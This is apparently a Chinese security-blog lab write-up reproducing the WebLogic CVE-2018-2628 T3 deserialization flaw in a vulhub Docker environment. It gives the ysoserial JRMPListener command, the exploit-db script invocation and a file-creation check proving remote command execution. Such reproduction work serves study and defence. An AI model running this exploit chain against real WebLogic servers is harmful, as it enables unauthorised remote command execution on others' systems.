漏洞介绍:
Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。
漏洞环境:
我这里是直接用vulhub搭建环境 docker-compose up -d 如图就搭建好了
访问一下your-ip:7001/console,这里会自动进行一些环境部署,出现登录界面就是搭建完成了。
攻击准备
java反序列化漏洞需要用到ysoserial
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
用法:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
这里我们主要填一下想要用的端口[listen port]和‘命令’就可以了。
exp:是exploit-db里的脚本,向目标Weblogic(http://your-ip:7001)发送数据包:
https://www.exploit-db.com/exploits/44553
主要用法:python exploit.py [目标 ip] [目标 port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
JRMPListener ip也就是本机ip,JRMPListener port是我们使用ysoseral命令时的设定的端口,接下来我用实例复现
有了工具我们就可以直接攻击了。
漏洞攻击:
java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 'touch /opt/1.txt'
1.在Ubuntu主机上运行JRMPListener开启端口监听。使得触发漏洞后weblogic所在服务器可以远程调用执行特定的程序。
2.用exp进行攻击。
python CVE-2018-2628\(exploit\).py 192.168.127.136 7001 ysoserial-master-30099844c6-1.jar 192.168.127.136 4444 JRMPClient
3.我们在docker看一下是否成功了
先docker ps一下
docker exec -it f72fee23afa1 /bin/bash
~/Oracle/Middleware# cd /opt
/opt# ls 1.txt(我们成功用命令创建的文件)
本文作者:hatjwe
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/139276.html